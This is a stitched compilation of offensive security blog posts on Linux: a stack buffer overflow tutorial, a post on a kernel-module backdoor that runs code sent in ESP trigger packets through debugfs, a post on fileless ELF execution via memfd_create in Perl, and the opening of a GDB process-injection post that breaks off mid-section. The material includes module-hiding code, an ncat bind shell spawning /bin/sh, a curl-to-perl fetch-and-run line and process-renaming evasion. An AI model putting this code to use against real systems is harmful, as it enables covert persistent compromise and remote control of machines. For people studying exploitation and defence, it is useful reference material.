Linux Buffer Overflows x86 Part 2 ( Overwriting and manipulating the RETURN address)

( Original text by SubZero0x9 )

Hello Friends, this is the 2nd part of the Linux x86 Buffer Overflows. First of all I want to apologize for such a long delay after the First blog of this series, there were personal and professional issues going on in my life (Well who hasn’t got them? Meh?).

In the previous part we learned about the Process Memory, Stack Region, Stack Operations, Stack Registers, Attempting Buffer Overflow, Overwriting Buffer, ESP and EIP. In case you missed it, here is the link to the Part 1:

https://movaxbx.ru/2018/11/06/getting-started-with-linux-buffer-overflows-x86-part-1-introduction/

Quick Recap to the Part 1:

-> We successfully exploited the insufficient bound checking by giving input which was larger than the buffer size, which led to the overflow.

-> We successfully attempted to overwrite the buffer and the EIP (Instruction Pointer).

-> We used GDB debugger to examine the buffer for our input and where it was placed on the stack.

Till now, we already know how to attempt a buffer overflow on a vulnerable binary. We already have the control of EIP and ESP.

So, Whats Next ?

Till now we have only overwritten the buffer. We haven’t really exploit anything yet. You may have read articles or PoC where Buffer Overflow is used to escalate privileges or it is used to get a reverse shell over the network from a vulnerable HTTP Server. Buffer Overflow is mainly used to execute arbitrary commands on the vulnerable system.

So, we will try to execute arbitrary commands by using this exploit technique.

In this blog, we will mainly focus on how to overwrite the return address to manipulate the flow of control and program execution.

Lets see this in more detail….

We will use a simple program to manipulate its intended output by changing the RETURN address.

(The following example is same as the AlephOne’s famous article on Stack Smashing with some modifications for a better and easy understanding)

Program:

 

This is a very simple program where the variable random is assigned a value ‘0’, then a function named function is called, the flow is transferred to the function()and it returns to the main() after executing its instructions. Then the variable random is assigned a value ‘1’ and then the current value of random is printed on the screen.

Simple program, we already know its output i.e 1.

But, what if we want to skip the instruction random=1; ?

That means, when the function() call returns to the main(), it will not perform the assignment of value ‘1’ to random and directly print the value of random as ‘0’.

So how can we achieve this?

Lets fire up GDB and see how the stack looks like for this program.

(I won’t be explaining each and every instruction, I have already done this in the previous blog. I will only go through the instructions which are important to us. For better understanding of how the stack is setup, refer to the previous blog.)

In GDB, first we disassemble the main function and look where the flow of the program is returned to main() after the function() call is over and also the address where the assignment of value ‘1’ to random takes place.

-> At the address 0x08048430, we can see the value ‘0’ is assigned to random.

-> Then at the address 0x08048437 the function() is called and the flow is redirected to the actual place where the function() resides in memory at 0x804840b address.

-> After the execution of function() is complete, it returns the flow to the main()and the next instruction which gets executed is the assignment of value ‘1’ to random which is at address 0x0804843c.

->If we want to skip past the instruction random=1; then we have to redirect the flow of program from 0x08048437 to 0x08048443. i.e after the completion of function() the EIP should point to 0x08048443 instead of 0x0804843c.

To achieve this, we will make some slight modifications to the function(), so that the return address should point to the instruction which directly prints the randomvariable as ‘0’.

Lets take a look at the execution of the function() and see where the EIP points.

-> As of now there is only a char array of 5 bytes inside the function(). So, nothing important is going on in this function call.

-> We set a breakpoint at function() and step through each instruction to see what the EIP points after the function() is exectued completely.

-> Through the command info regsiters eip we can see the EIP is pointing to the address 0x0804843c which is nothing but the instruction random=1;

Lets make this happen!!!

From the previous blog, we came to know about the stack layout. We can see how the top of the stack is aligned, 8 bytes for the buffer, 4 bytes for the EBP, 4 bytes for the RET address and so on (If there is a value passed as parameter in a function then it gets pushed first onto the stack when the function is called).

-> When the function() is called, first the RET address gets pushed onto the stack so the program flow can be maintained after the execution of function().

->Then the EBP gets pushed onto the stack, so the EBP can act as the offset reference point for other instructions to access and calculate the memory addresses.

-> We have char array buffer of 5 bytes, but the memory is allocated in terms of WORD. Basically 1 word=4 bytes. Even if you declare a variable or array of 2 bytes it will be allocated as 4 bytes or 1 word. So, here 5 bytes=2 words i.e 8 bytes.

-> So, in our case when inside the function(), the stack will probably be setup as buffer + EBP + RET

-> Now we know that after 12 bytes, the flow of the program will return to main()and the instruction random = 1; will be executed. We want to skip past this instruction by manipulating the RET address to somehow point to the address after 0x0804843c.

->We will now try to manipulate the RET address by doing something like below :-

 

Here, we are introducing an int pointer ret, and we are assigning it the starting address of buffer + 12 .i.e (wait lets see this in a diagram)

-> So, the ret pointer now ends exactly at the start where the return value is actually stored. Now, we just want to add ret pointer with some value which will change the return value in such a manner that it will skip past the return = 1;instruction.

Lets just go back to the disassembled main function and calculate how much we have to add to the ret pointer to actually skip past the assignment instruction.

-> So, we already know we want to skip pass the instruction at address 0x0804843c to address 0x08048443. By subtracting these two address we get 7. So we will add 7 to the return address so that it will point to the instruction at address 0x08048443.

-> And now we will add 7 to the ret pointer.

 

So our final code should look like:

 

So, now we will compile our code.

 

Since we are adding code and re-compiling the program, the memory addresses will get changed.

Lets take a look at the new memory addresses.

-> Now the assignment instruction random = 1; is at address 0x08048452 and the next address which we want the return address to point is 0x08048459. The difference between these addresses is still 7. So we are good till now.

Hopefully by executing this we will get the output as “The value of random is: 0”

HOLY HELL!!!

Why did it gave the Segmentation fault (core dumped)? That means maybe the process is trying to access a memory that doesn’t exist or something.

Note:- Well this was really tricky for me atleast. Computers works in mysterious ways, it is not just mathematics, numbers and science ( Yeah I am being dramatic)

Lets fire up our binary in GDB and see whats wrong.

-> As you can see we set a breakpoint at line 4 and run the program. The breakpoint hits and the program halts. Then we examine the stack top and what we see, the distance between the start of the buffer and the start of return address is not 12, its 13. (It doesn’t even make sense mathematically). Three full block adds up for 12 bytes (4 bytes each) and 1 byte for that ‘A’ i.e 41.

-> Our buffer had value “ABCDE” in it. And A in ASCII hex is 41. From 41 to just right before of the return address 0x08048452, the count is 13 which traditionally is not correct. I still don’t know why the difference is 13 instead of 12, if anyone knows kindly tell me in the comments section.

-> So we just change our code from ret = buffer + 12; to ret = buffer + 13;

Now the final code will look like this:

 

Now, we re-compile it and run and hope its now going to give a desired output.

Before continuing lets see this again in GDB:

> So, we can see now after 7 is added to the ret pointer, the return address is now 0x08048459 which means we have successfully skipped past the assignment instruction and overwritten the return address to manipulate our way around the program flow to alter the program execution.

Till now we learnt a very important part of buffer overflow i.e how to manipulate and overwrite the return address to alter the program execution flow.

Now, lets another example where we can overwrite the return address in more similar ‘buffer overflow’ fashion.

We will use the program from protostar buffer overflow series. You can find more about it here: https://exploit-exercises.com/protostar/

 

Small overview of a program:-

->There is a function win() which has some message saying “code flow successfully changed”. So we assume this is the goal.
-> Then there is the main(), int pointer fp is declared and defined to ‘0’ along with char array buffer with size 64. The program asks for user input using the getsfunction and the input is stored in the array buffer.
-> Then there is an if statement where if fp is not equal to zero then it calls the function pointer jumping to some memory location.

Now we already know that gets function is vulnerable to buffer overflow (visit previous blog) and we have to execute the win() function. So by not wasting time lets find out the where the overflow happens.

First we will compile the code:

 

We know that the char array buffer is of 64 bytes. So lets feed input accordingly.

So, as we can see after the 64th byte the overflow occurs and the 65th ‘A’ i.e 41 in ASCII Hex is overwriting the EIP.

Lets confirm this in GDB:

-> As we see the buffer gets overflowed and the EIP is overwritten with ‘A’ i.e 41.

Now lets find the address of the win() function. We can find this with GDB or by objdump.

Objdump is a tool which is used to display information about object files. It comes with almost every Linux distribution.

The -d switch stands for disassemble. When we use this, every function used in a binary is listed, but we just wanted the address of win() function so we just used grep to find our required string in the output.

So it tells us that the win() function’s starting address is 0804846b. To achieve our goal we just have to pass this address after the 64th byte so that the EIP will get overwritten by this address and execute the win() function for us.

But since our machine is little endian (Find more about it here)we have to pass the address in a slightly different manner (basically in reverse). So the address 0804846b will become \x6b\x84\x04\x08 where the \x stands for HEX value.

Now lets just form our input:

As we can see the win() function is successfully executed. The EIP is also pointing the address of win().

Hence, we have successfully overwritten the return address and exploited the buffer overflow vulnerability.

Thats all for this blog. I am sorry but this blog also went quite long, but I will try to keep the next blog much shorter. And also, in the next blog we will try to play with shellcode.

 

 

Реклама

Misusing debugfs for In-Memory RCE

An explanation of how debugfs and nf hooks can be used to remotely execute code.

Картинки по запросу debugfs

Introduction

Debugfs is a simple-to-use RAM-based file system specially designed for kernel debugging purposes. It was released with version 2.6.10-rc3 and written by Greg Kroah-Hartman. In this post, I will be showing you how to use debugfs and Netfilter hooks to create a Loadable Kernel Module capable of executing code remotely entirely in RAM.

An attacker’s ideal process would be to first gain unprivileged access to the target, perform a local privilege escalation to gain root access, insert the kernel module onto the machine as a method of persistence, and then pivot to the next target.

Note: The following is tested and working on clean images of Ubuntu 12.04 (3.13.0-32), Ubuntu 14.04 (4.4.0-31), Ubuntu 16.04 (4.13.0-36). All development was done on Arch throughout a few of the most recent kernel versions (4.16+).

Practicality of a debugfs RCE

When diving into how practical using debugfs is, I needed to see how prevalent it was across a variety of systems.

For every Ubuntu release from 6.06 to 18.04 and CentOS versions 6 and 7, I created a VM and checked the three statements below. This chart details the answers to each of the questions for each distro. The main thing I was looking for was to see if it was even possible to mount the device in the first place. If that was not possible, then we won’t be able to use debugfs in our backdoor.

Fortunately, every distro, except Ubuntu 6.06, was able to mount debugfs. Every Ubuntu version from 10.04 and on as well as CentOS 7 had it mounted by default.

  1. Present: Is /sys/kernel/debug/ present on first load?
  2. Mounted: Is /sys/kernel/debug/ mounted on first load?
  3. Possible: Can debugfs be mounted with sudo mount -t debugfs none /sys/kernel/debug?
Operating System Present Mounted Possible
Ubuntu 6.06 No No No
Ubuntu 8.04 Yes No Yes
Ubuntu 10.04* Yes Yes Yes
Ubuntu 12.04 Yes Yes Yes
Ubuntu 14.04** Yes Yes Yes
Ubuntu 16.04 Yes Yes Yes
Ubuntu 18.04 Yes Yes Yes
Centos 6.9 Yes No Yes
Centos 7 Yes Yes Yes
  • *debugfs also mounted on the server version as rw,relatime on /var/lib/ureadahead/debugfs
  • **tracefs also mounted on the server version as rw,relatime on /var/lib/ureadahead/debugfs/tracing

Executing code on debugfs

Once I determined that debugfs is prevalent, I wrote a simple proof of concept to see if you can execute files from it. It is a filesystem after all.

The debugfs API is actually extremely simple. The main functions you would want to use are: debugfs_initialized — check if debugfs is registered, debugfs_create_blob — create a file for a binary object of arbitrary size, and debugfs_remove — delete the debugfs file.

In the proof of concept, I didn’t use debugfs_initialized because I know that it’s present, but it is a good sanity-check.

To create the file, I used debugfs_create_blob as opposed to debugfs_create_file as my initial goal was to execute ELF binaries. Unfortunately I wasn’t able to get that to work — more on that later. All you have to do to create a file is assign the blob pointer to a buffer that holds your content and give it a length. It’s easier to think of this as an abstraction to writing your own file operations like you would do if you were designing a character device.

The following code should be very self-explanatory. dfs holds the file entry and myblob holds the file contents (pointer to the buffer holding the program and buffer length). I simply call the debugfs_create_blob function after the setup with the name of the file, the mode of the file (permissions), NULL parent, and lastly the data.

struct dentry *dfs = NULL;
struct debugfs_blob_wrapper *myblob = NULL;

int create_file(void){
	unsigned char *buffer = "\
#!/usr/bin/env python\n\
with open(\"/tmp/i_am_groot\", \"w+\") as f:\n\
	f.write(\"Hello, world!\")";

	myblob = kmalloc(sizeof *myblob, GFP_KERNEL);
	if (!myblob){
		return -ENOMEM;
	}

	myblob->data = (void *) buffer;
	myblob->size = (unsigned long) strlen(buffer);

	dfs = debugfs_create_blob("debug_exec", 0777, NULL, myblob);
	if (!dfs){
		kfree(myblob);
		return -EINVAL;
	}
	return 0;
}

Deleting a file in debugfs is as simple as it can get. One call to debugfs_remove and the file is gone. Wrapping an error check around it just to be sure and it’s 3 lines.

void destroy_file(void){
	if (dfs){
		debugfs_remove(dfs);
	}
}

Finally, we get to actually executing the file we created. The standard and as far as I know only way to execute files from kernel-space to user-space is through a function called call_usermodehelper. M. Tim Jones wrote an excellent article on using UMH called Invoking user-space applications from the kernel, so if you want to learn more about it, I highly recommend reading that article.

To use call_usermodehelper we set up our argv and envp arrays and then call the function. The last flag determines how the kernel should continue after executing the function (“Should I wait or should I move on?”). For the unfamiliar, the envp array holds the environment variables of a process. The file we created above and now want to execute is /sys/kernel/debug/debug_exec. We can do this with the code below.

void execute_file(void){
	static char *envp[] = {
		"SHELL=/bin/bash",
		"PATH=/usr/local/sbin:/usr/local/bin:"\
			"/usr/sbin:/usr/bin:/sbin:/bin",
		NULL
	};

	char *argv[] = {
		"/sys/kernel/debug/debug_exec",
		NULL
	};

	call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}

I would now recommend you try the PoC code to get a good feel for what is being done in terms of actually executing our program. To check if it worked, run ls /tmp/ and see if the file i_am_groot is present.

Netfilter

We now know how our program gets executed in memory, but how do we send the code and get the kernel to run it remotely? The answer is by using Netfilter! Netfilter is a framework in the Linux kernel that allows kernel modules to register callback functions called hooks in the kernel’s networking stack.

If all that sounds too complicated, think of a Netfilter hook as a bouncer of a club. The bouncer is only allowed to let club-goers wearing green badges to go through (ACCEPT), but kicks out anyone wearing red badges (DENY/DROP). He also has the option to change anyone’s badge color if he chooses. Suppose someone is wearing a red badge, but the bouncer wants to let them in anyway. The bouncer can intercept this person at the door and alter their badge to be green. This is known as packet “mangling”.

For our case, we don’t need to mangle any packets, but for the reader this may be useful. With this concept, we are allowed to check any packets that are coming through to see if they qualify for our criteria. We call the packets that qualify “trigger packets” because they trigger some action in our code to occur.

Netfilter hooks are great because you don’t need to expose any ports on the host to get the information. If you want a more in-depth look at Netfilter you can read the article here or the Netfilter documentation.

netfilter hooks

When I use Netfilter, I will be intercepting packets in the earliest stage, pre-routing.

ESP Packets

The packet I chose to use for this is called ESP. ESP or Encapsulating Security Payload Packets were designed to provide a mix of security services to IPv4 and IPv6. It’s a fairly standard part of IPSec and the data it transmits is supposed to be encrypted. This means you can put an encrypted version of your script on the client and then send it to the server to decrypt and run.

Netfilter Code

Netfilter hooks are extremely easy to implement. The prototype for the hook is as follows:

unsigned int function_name (
		unsigned int hooknum,
		struct sk_buff *skb,
		const struct net_device *in,
		const struct net_device *out,
		int (*okfn)(struct sk_buff *)
);

All those arguments aren’t terribly important, so let’s move on to the one you need: struct sk_buff *skbsk_buffs get a little complicated so if you want to read more on them, you can find more information here.

To get the IP header of the packet, use the function skb_network_header and typecast it to a struct iphdr *.

struct iphdr *ip_header;

ip_header = (struct iphdr *)skb_network_header(skb);
if (!ip_header){
	return NF_ACCEPT;
}

Next we need to check if the protocol of the packet we received is an ESP packet or not. This can be done extremely easily now that we have the header.

if (ip_header->protocol == IPPROTO_ESP){
	// Packet is an ESP packet
}

ESP Packets contain two important values in their header. The two values are SPI and SEQ. SPI stands for Security Parameters Index and SEQ stands for Sequence. Both are technically arbitrary initially, but it is expected that the sequence number be incremented each packet. We can use these values to define which packets are our trigger packets. If a packet matches the correct SPI and SEQ values, we will perform our action.

if ((esp_header->spi == TARGET_SPI) &&
	(esp_header->seq_no == TARGET_SEQ)){
	// Trigger packet arrived
}

Once you’ve identified the target packet, you can extract the ESP data using the struct’s member enc_data. Ideally, this would be encrypted thus ensuring the privacy of the code you’re running on the target computer, but for the sake of simplicity in the PoC I left it out.

The tricky part is that Netfilter hooks are run in a softirq context which makes them very fast, but a little delicate. Being in a softirq context allows Netfilter to process incoming packets across multiple CPUs concurrently. They cannot go to sleep and deferred work runs in an interrupt context (this is very bad for us and it requires using delayed workqueues as seen in state.c).

The full code for this section can be found here.

Limitations

  1. Debugfs must be present in the kernel version of the target (>= 2.6.10-rc3).
  2. Debugfs must be mounted (this is trivial to fix if it is not).
  3. rculist.h must be present in the kernel (>= linux-2.6.27.62).
  4. Only interpreted scripts may be run.

Anything that contains an interpreter directive (python, ruby, perl, etc.) works together when calling call_usermodehelper on it. See this wikipedia article for more information on the interpreter directive.

void execute_file(void){
	static char *envp[] = {
		"SHELL=/bin/bash",
		"HOME=/root/",
		"USER=root",
		"PATH=/usr/local/sbin:/usr/local/bin:"\
			"/usr/sbin:/usr/bin:/sbin:/bin",
		"DISPLAY=:0",
		"PWD=/", 
		NULL
	};

	char *argv[] = {
		"/sys/kernel/debug/debug_exec",
		NULL
	};

    call_usermodehelper(argv[0], argv, envp, UMH_WAIT_PROC);
}

Go also works, but it’s arguably not entirely in RAM as it has to make a temp file to build it and it also requires the .go file extension making this a little more obvious.

void execute_file(void){
	static char *envp[] = {
		"SHELL=/bin/bash",
		"HOME=/root/",
		"USER=root",
		"PATH=/usr/local/sbin:/usr/local/bin:"\
			"/usr/sbin:/usr/bin:/sbin:/bin",
		"DISPLAY=:0",
		"PWD=/", 
		NULL
	};

	char *argv[] = {
		"/usr/bin/go",
		"run",
		"/sys/kernel/debug/debug_exec.go",
		NULL
	};

    call_usermodehelper(argv[0], argv, envp, UMH_WAIT_PROC);
}

Discovery

If I were to add the ability to hide a kernel module (which can be done trivially through the following code), discovery would be very difficult. Long-running processes executing through this technique would be obvious as there would be a process with a high pid number, owned by root, and running <interpreter> /sys/kernel/debug/debug_exec. However, if there was no active execution, it leads me to believe that the only method of discovery would be a secondary kernel module that analyzes custom Netfilter hooks.

struct list_head *module;
int module_visible = 1;

void module_unhide(void){
	if (!module_visible){
		list_add(&(&__this_module)->list, module);
		module_visible++;
	}
}

void module_hide(void){
	if (module_visible){
		module = (&__this_module)->list.prev;
		list_del(&(&__this_module)->list);
		module_visible--;
	}
}

Mitigation

The simplest mitigation for this is to remount debugfs as noexec so that execution of files on it is prohibited. To my knowledge, there is no reason to have it mounted the way it is by default. However, this could be trivially bypassed. An example of execution no longer working after remounting with noexec can be found in the screenshot below.

For kernel modules in general, module signing should be required by default. Module signing involves cryptographically signing kernel modules during installation and then checking the signature upon loading it into the kernel. “This allows increased kernel security by disallowing the loading of unsigned modules or modules signed with an invalid key. Module signing increases security by making it harder to load a malicious module into the kernel.

debugfs with noexec

# Mounted without noexec (default)
cat /etc/mtab | grep "debugfs"
ls -la /tmp/i_am_groot
sudo insmod test.ko
ls -la /tmp/i_am_groot
sudo rmmod test.ko
sudo rm /tmp/i_am_groot
sudo umount /sys/kernel/debug
# Mounted with noexec
sudo mount -t debugfs none -o rw,noexec /sys/kernel/debug
ls -la /tmp/i_am_groot
sudo insmod test.ko
ls -la /tmp/i_am_groot
sudo rmmod test.ko

Future Research

An obvious area to expand on this would be finding a more standard way to load programs as well as a way to load ELF files. Also, developing a kernel module that can distinctly identify custom Netfilter hooks that were loaded in from kernel modules would be useful in defeating nearly every LKM rootkit that uses Netfilter hooks.

In-Memory-Only ELF Execution (Without tmpfs)

In which we run a normal ELF binary on Linux without touching the filesystem (except /proc).

Introduction

Every so often, it’s handy to execute an ELF binary without touching disk. Normally, putting it somewhere under /run/user or something else backed by tmpfs works just fine, but, outside of disk forensics, that looks like a regular file operation. Wouldn’t it be cool to just grab a chunk of memory, put our binary in there, and run it without monkey-patching the kernel, rewriting execve(2) in userland, or loading a library into another process?

Enter memfd_create(2). This handy little system call is something like malloc(3), but instead of returning a pointer to a chunk of memory, it returns a file descriptor which refers to an anonymous (i.e. memory-only) file. This is only visible in the filesystem as a symlink in /proc/<PID>/fd/ (e.g. /proc/10766/fd/3), which, as it turns out, execve(2) will happily use to execute an ELF binary.

The manpage has the following to say on the subject of naming anonymous files:

The name supplied in name [an argument to memfd_create(2)] is used as a filename and will be displayed as the target of the corresponding symbolic link in the directory /proc/self/fd/. The displayed name is always prefixed with memfd: and serves only for debugging purposes. Names do not affect the behavior of the file descriptor, and as such multiple files can have the same name without any side effects.

In other words, we can give it a name (to which memfd: will be prepended), but what we call it doesn’t really do anything except help debugging (or forensicing). We can even give the anonymous file an empty name.

Listing /proc/<PID>/fd, anonymous files look like this:

stuart@ubuntu-s-1vcpu-1gb-nyc1-01:~$ ls -l /proc/10766/fd
total 0
lrwx------ 1 stuart stuart 64 Mar 30 23:23 0 -> /dev/pts/0
lrwx------ 1 stuart stuart 64 Mar 30 23:23 1 -> /dev/pts/0
lrwx------ 1 stuart stuart 64 Mar 30 23:23 2 -> /dev/pts/0
lrwx------ 1 stuart stuart 64 Mar 30 23:23 3 -> /memfd:kittens (deleted)
lrwx------ 1 stuart stuart 64 Mar 30 23:23 4 -> /memfd: (deleted)

Here we see two anonymous files, one named kittens and one without a name at all. The (deleted) is inaccurate and looks a bit weird but c’est la vie.

Caveats

Unless we land on target with some way to call memfd_create(2), from our initial vector (e.g. injection into a Perl or Python program with eval()), we’ll need a way to execute system calls on target. We could drop a binary to do this, but then we’ve failed to acheive fileless ELF execution. Fortunately, Perl’s syscall() solves this problem for us nicely.

We’ll also need a way to write an entire binary to the target’s memory as the contents of the anonymous file. For this, we’ll put it in the source of the script we’ll write to do the injection, but in practice pulling it down over the network is a viable alternative.

As for the binary itself, it has to be, well, a binary. Running scripts starting with #!/interpreter doesn’t seem to work.

The last thing we need is a sufficiently new kernel. Anything version 3.17 (released 05 October 2014) or later will work. We can find the target’s kernel version with uname -r.

stuart@ubuntu-s-1vcpu-1gb-nyc1-01:~$ uname -r
4.4.0-116-generic

On Target

Aside execve(2)ing an anonymous file instead of a regular filesystem file and doing it all in Perl, there isn’t much difference from starting any other program. Let’s have a look at the system calls we’ll use.

memfd_create(2)

Much like a memory-backed fd = open(name, O_CREAT|O_RDWR, 0700), we’ll use the memfd_create(2) system call to make our anonymous file. We’ll pass it the MFD_CLOEXEC flag (analogous to O_CLOEXEC), so that the file descriptor we get will be automatically closed when we execve(2) the ELF binary.

Because we’re using Perl’s syscall() to call the memfd_create(2), we don’t have easy access to a user-friendly libc wrapper function or, for that matter, a nice human-readable MFD_CLOEXEC constant. Instead, we’ll need to pass syscall() the raw system call number for memfd_create(2) and the numeric constant for MEMFD_CLOEXEC. Both of these are found in header files in /usr/include. System call numbers are stored in #defines starting with __NR_.

stuart@ubuntu-s-1vcpu-1gb-nyc1-01:/usr/include$ egrep -r '__NR_memfd_create|MFD_CLOEXEC' *
asm-generic/unistd.h:#define __NR_memfd_create 279
asm-generic/unistd.h:__SYSCALL(__NR_memfd_create, sys_memfd_create)
linux/memfd.h:#define MFD_CLOEXEC               0x0001U
x86_64-linux-gnu/asm/unistd_64.h:#define __NR_memfd_create 319
x86_64-linux-gnu/asm/unistd_32.h:#define __NR_memfd_create 356
x86_64-linux-gnu/asm/unistd_x32.h:#define __NR_memfd_create (__X32_SYSCALL_BIT + 319)
x86_64-linux-gnu/bits/syscall.h:#define SYS_memfd_create __NR_memfd_create
x86_64-linux-gnu/bits/syscall.h:#define SYS_memfd_create __NR_memfd_create
x86_64-linux-gnu/bits/syscall.h:#define SYS_memfd_create __NR_memfd_create

Looks like memfd_create(2) is system call number 319 on 64-bit Linux (#define __NR_memfd_create in a file with a name ending in _64.h), and MFD_CLOEXEC is a consatnt 0x0001U (i.e. 1, in linux/memfd.h). Now that we’ve got the numbers we need, we’re almost ready to do the Perl equivalent of C’s fd = memfd_create(name, MFD_CLOEXEC) (or more specifically, fd = syscall(319, name, MFD_CLOEXEC)).

The last thing we need is a name for our file. In a file listing, /memfd: is probably a bit better-looking than /memfd:kittens, so we’ll pass an empty string to memfd_create(2) via syscall(). Perl’s syscall() won’t take string literals (due to passing a pointer under the hood), so we make a variable with the empty string and use it instead.

Putting it together, let’s finally make our anonymous file:

my $name = "";
my $fd = syscall(319, $name, 1);
if (-1 == $fd) {
        die "memfd_create: $!";
}

We now have a file descriptor number in $fd. We can wrap that up in a Perl one-liner which lists its own file descriptors after making the anonymous file:

stuart@ubuntu-s-1vcpu-1gb-nyc1-01:~$ perl -e '$n="";die$!if-1==syscall(319,$n,1);print`ls -l /proc/$$/fd`'
total 0
lrwx------ 1 stuart stuart 64 Mar 31 02:44 0 -> /dev/pts/0
lrwx------ 1 stuart stuart 64 Mar 31 02:44 1 -> /dev/pts/0
lrwx------ 1 stuart stuart 64 Mar 31 02:44 2 -> /dev/pts/0
lrwx------ 1 stuart stuart 64 Mar 31 02:44 3 -> /memfd: (deleted)

write(2)

Now that we have an anonymous file, we need to fill it with ELF data. First we’ll need to get a Perl filehandle from a file descriptor, then we’ll need to get our data in a format that can be written, and finally, we’ll write it.

Perl’s open(), which is normally used to open files, can also be used to turn an already-open file descriptor into a file handle by specifying something like >&=X (where X is a file descriptor) instead of a file name. We’ll also want to enable autoflush on the new file handle:

open(my $FH, '>&='.$fd) or die "open: $!";
select((select($FH), $|=1)[0]);

We now have a file handle which refers to our anonymous file.

Next we need to make our binary available to Perl, so we can write it to the anonymous file. We’ll turn the binary into a bunch of Perl print statements of which each write a chunk of our binary to the anonymous file.

perl -e '$/=\32;print"print \$FH pack q/H*/, q/".(unpack"H*")."/\ or die qq/write: \$!/;\n"while(<>)' ./elfbinary

This will give us many, many lines similar to:

print $FH pack q/H*/, q/7f454c4602010100000000000000000002003e0001000000304f450000000000/ or die qq/write: $!/;
print $FH pack q/H*/, q/4000000000000000c80100000000000000000000400038000700400017000300/ or die qq/write: $!/;
print $FH pack q/H*/, q/0600000004000000400000000000000040004000000000004000400000000000/ or die qq/write: $!/;

Exceuting those puts our ELF binary into memory. Time to run it.

Optional: fork(2)

Ok, fork(2) is isn’t actually a system call; it’s really a libc function which does all sorts of stuff under the hood. Perl’s fork() is functionally identical to libc’s as far as process-making goes: once it’s called, there are now two nearly identical processes running (of which one, usually the child, often finds itself calling exec(2)). We don’t actually have to spawn a new process to run our ELF binary, but if we want to do more than just run it and exit (say, run it multiple times), it’s the way to go. In general, using fork() to spawn multiple children looks something like:

while ($keep_going) {
        my $pid = fork();
        if (-1 == $pid) { # Error
                die "fork: $!";
        }
        if (0 == $pid) { # Child
                # Do child things here
                exit 0;
        }
}

Another handy use of fork(), especially when done twice with a call to setsid(2) in the middle, is to spawn a disassociated child and let the parent terminate:

# Spawn child
my $pid = fork();
if (-1 == $pid) { # Error
        die "fork1: $!";
}
if (0 != $pid) { # Parent terminates
        exit 0;
}
# In the child, become session leader
if (-1 == syscall(112)) {
        die "setsid: $!";
}

# Spawn grandchild
$pid = fork();
if (-1 == $pid) { # Error
        die "fork2: $!";
}
if (0 != $pid) { # Child terminates
        exit 0;
}
# In the grandchild here, do grandchild things

We can now have our ELF process run multiple times or in a separate process. Let’s do it.

execve(2)

Linux process creation is a funny thing. Ever since the early days of Unix, process creation has been a combination of not much more than duplicating a current process and swapping out the new clone’s program with what should be running, and on Linux it’s no different. The execve(2) system call does the second bit: it changes one running program into another. Perl gives us exec(), which does more or less the same, albiet with easier syntax.

We pass to exec() two things: the file containing the program to execute (i.e. our in-memory ELF binary) and a list of arguments, of which the first element is usually taken as the process name. Usually, the file and the process name are the same, but since it’d look bad to have /proc/<PID>/fd/3 in a process listing, we’ll name our process something else.

The syntax for calling exec() is a bit odd, and explained much better in the documentation. For now, we’ll take it on faith that the file is passed as a string in curly braces and there follows a comma-separated list of process arguments. We can use the variable $$ to get the pid of our own Perl process. For the sake of clarity, the following assumes we’ve put ncat in memory, but in practice, it’s better to use something which takes arguments that don’t look like a backdoor.

exec {"/proc/$$/fd/$fd"} "kittens", "-kvl", "4444", "-e", "/bin/sh" or die "exec: $!";

The new process won’t have the anonymous file open as a symlink in /proc/<PID>/fd, but the anonymous file will be visible as the/proc/<PID>/exe symlink, which normally points to the file containing the program which is being executed by the process.

We’ve now got an ELF binary running without putting anything on disk or even in the filesystem.

Scripting it

It’s not likely we’ll have the luxury of being able to sit on target and do all of the above by hand. Instead, we’ll pipe the script (elfload.pl in the example below) via SSH to Perl’s stdin, and use a bit of shell trickery to keep perl with no arguments from showing up in the process list:

cat ./elfload.pl | ssh user@target /bin/bash -c '"exec -a /sbin/iscsid perl"'

This will run Perl, renamed in the process list to /sbin/iscsid with no arguments. When not given a script or a bit of code with -e, Perl expects a script on stdin, so we send the script to perl stdin via our local SSH client. The end result is our script is run without touching disk at all.

Without creds but with access to the target (i.e. after exploiting on), in most cases we can probably use the devopsy curl http://server/elfload.pl | perl trick (or intercept someone doing the trick for us). As long as the script makes it to Perl’s stdin and Perl gets an EOF when the script’s all read, it doesn’t particularly matter how it gets there.

Artifacts

Once running, the only real difference between a program running from an anonymous file and a program running from a normal file is the /proc/<PID>/exe symlink.

If something’s monitoring system calls (e.g. someone’s running strace -f on sshd), the memfd_create(2) calls will stick out, as will passing paths in /proc/<PID>/fd to execve(2).

Other than that, there’s very little evidence anything is wrong.

Demo

To see this in action, have a look at this asciicast. asciicast

In C (translate to your non-disk-touching language of choice):

  1. fd = memfd_create("", MFD_CLOEXEC);
  2. write(pid, elfbuffer, elfbuffer_len);
  3. asprintf(p, "/proc/self/fd/%i", fd); execl(p, "kittens", "arg1", "arg2", NULL);

Process Injection with GDB

Inspired by excellent CobaltStrike training, I set out to work out an easy way to inject into processes in Linux. There’s been quite a lot of experimentation with this already, usually using ptrace(2) orLD_PRELOAD, but I wanted something a little simpler and less error-prone, perhaps trading ease-of-use for flexibility and works-everywhere. Enter GDB and shared object files (i.e. libraries).

GDB, for those who’ve never found themselves with a bug unsolvable with lots of well-placed printf("Here\n") statements, is the GNU debugger. It’s typical use is to poke at a runnnig process for debugging, but it has one interesting feature: it can have the debugged process call library functions. There are two functions which we can use to load a library into to the program: dlopen(3)from libdl, and __libc_dlopen_mode, libc’s implementation. We’ll use __libc_dlopen_mode because it doesn’t require the host process to have libdl linked in.

In principle, we could load our library and have GDB call one of its functions. Easier than that is to have the library’s constructor function do whatever we would have done manually in another thread, to keep the amount of time the process is stopped to a minimum. More below.

Caveats

Trading flexibility for ease-of-use puts a few restrictions on where and how we can inject our own code. In practice, this isn’t a problem, but there are a few gotchas to consider.

ptrace(2)

We’ll need to be able to attach to the process with ptrace(2), which GDB uses under the hood. Root can usually do this, but as a user, we can only attach to our own processes. To make it harder, some systems only allow processes to attach to their children, which can be changed via a sysctl. Changing the sysctl requires root, so it’s not very useful in practice. Just in case:

sysctl kernel.yama.ptrace_scope=0
# or
echo 0 > /proc/sys/kernel/yama/ptrace_scope

Generally, it’s better to do this as root.

Stopped Processes

When GDB attaches to a process, the process is stopped. It’s best to script GDB’s actions beforehand, either with -x and --batch or echoing commands to GDB minimize the amount of time the process isn’t doing whatever it should be doing. If, for whatever reason, GDB doesn’t restart the process when it exits, sending the process SIGCONT should do the trick.

kill -CONT <PID>

Process Death

